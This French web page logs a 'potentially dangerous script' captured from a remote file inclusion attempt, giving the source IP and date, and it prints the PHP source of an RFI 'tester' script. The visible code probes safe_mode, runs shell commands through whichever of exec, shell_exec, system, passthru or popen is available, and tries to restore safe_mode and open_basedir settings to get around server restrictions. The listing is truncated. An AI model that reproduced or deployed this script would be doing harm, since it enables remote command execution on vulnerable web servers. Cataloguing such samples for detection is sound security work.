Script potentiellement dangereux sur mail-admnyagan-ru
IP de provenance : 213.206.94.197
Date de connexion : 12-04-2008 14:21:10
Site : http://mail.admnyagan.ru/config/tester.txt?
Retour liste scripts
<?php
//tester v0.01 for rfi reloader by
axe
$safemode=@ini_get('safe_mode');
$ker = @php_uname();
if(!$safemode &&
!ereg('666AreYou',exec666('echo 666AreYou'))) $safemode = 1;
function
exec666($cmd)
{
$result =
'';
if(!empty($cmd))
{
if(function_exists('exec'))
{
@exec($cmd,$result)
;
$result =
implode("\n",$result);
}
elseif(function_exists('shell_exec'))
$result =
@shell_exec($cmd);
elseif(function_exists('system'))
{
@ob_start();
@syste
m($cmd);
$result =
@ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cmd);
$result =
@ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f =
@popen($cmd,"r")))
{
$result = "";
while(!@feof($f)) { $result .=
@fread($f,1024); }
@pclose($f);
}
}
return
$result;
}
if($safemode)
{
ini_restore("safe_mode");
ini_restore("open_basedir
");
[...]
Retour liste scripts
Crédits vignettes :
Thumbzor